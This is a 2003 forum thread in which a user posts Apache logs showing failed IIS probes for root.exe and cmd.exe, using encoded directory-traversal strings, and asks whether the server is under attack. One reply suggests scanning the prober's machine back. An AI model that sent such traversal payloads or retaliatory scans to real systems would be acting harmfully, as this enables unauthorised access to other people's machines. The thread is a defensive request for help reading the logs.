遭到攻击?

solar

those messages are in log files on my new personal server:

218.16.104.62 - - [17/Jan/2003:09:32:49 +0800] \"GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 287
218.16.104.62 - - [17/Jan/2003:09:32:54 +0800] \"GET /MSADC/root.exe?/c+dir HTTP/1.0\" 404 285
218.16.104.62 - - [17/Jan/2003:09:32:58 +0800] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 295


[Fri Jan 17 09:32:49 2003] [error] [client 218.16.104.62] File does not exist: /var/apache/htdocs/scripts/root.exe
[Fri Jan 17 09:32:54 2003] [error] [client 218.16.104.62] File does not exist: /var/apache/htdocs/MSADC/root.exe
[Fri Jan 17 09:32:58 2003] [error] [client 218.16.104.62] File does not exist: /var/apache/htdocs/c/winnt/system32/cmd.exe


18.104.16.133 - - [16/Jan/2003:18:24:37 +0800] \"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 309
218.104.16.133 - - [16/Jan/2003:18:24:37 +0800] \"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 326
218.104.16.133 - - [16/Jan/2003:18:24:37 +0800] \"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 326
218.104.16.133 - - [16/Jan/2003:18:24:38 +0800] \"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 342
218.104.16.133 - - [16/Jan/2003:18:24:38 +0800] \"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308
218.104.16.133 - - [16/Jan/2003:18:24:38 +0800] \"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308
218.104.16.133 - - [16/Jan/2003:18:24:39 +0800] \"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308
218.104.16.133 - - [16/Jan/2003:18:24:39 +0800] \"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308
218.104.16.133 - - [16/Jan/2003:18:24:40 +0800] \"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 292
218.104.16.133 - - [16/Jan/2003:18:24:40 +0800] \"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 400 292
218.104.16.133 - - [16/Jan/2003:18:24:40 +0800] \"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 309
218.104.16.133 - - [16/Jan/2003:18:24:41 +0800] \"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 309
218.16.65.158 - - [16/Jan/2003:19:26:16 +0800] \"GET /scripts/root.exe?/c+dir HTTP/1.0\" 404 287
218.16.65.158 - - [16/Jan/2003:19:26:16 +0800] \"GET /MSADC/root.exe?/c+dir HTTP/1.0\" 404 285
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 295
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 295
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 309
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 326
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 326
218.16.65.158 - - [16/Jan/2003:19:26:17 +0800] \"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 342
218.16.65.158 - - [16/Jan/2003:19:26:18 +0800] \"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308
218.16.65.158 - - [16/Jan/2003:19:26:18 +0800] \"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 404 308

solar

please give me some advice.

非凡公子

呵呵，廣東的IP呀

他在描你的機子啦，經常會有的

呵呵，它的機子的安全應該比你還差，不信你自己掃掃它

solar

his software/case is only attacking to win system. it\'s ok?

vangogh

好像是，在找.exe的文件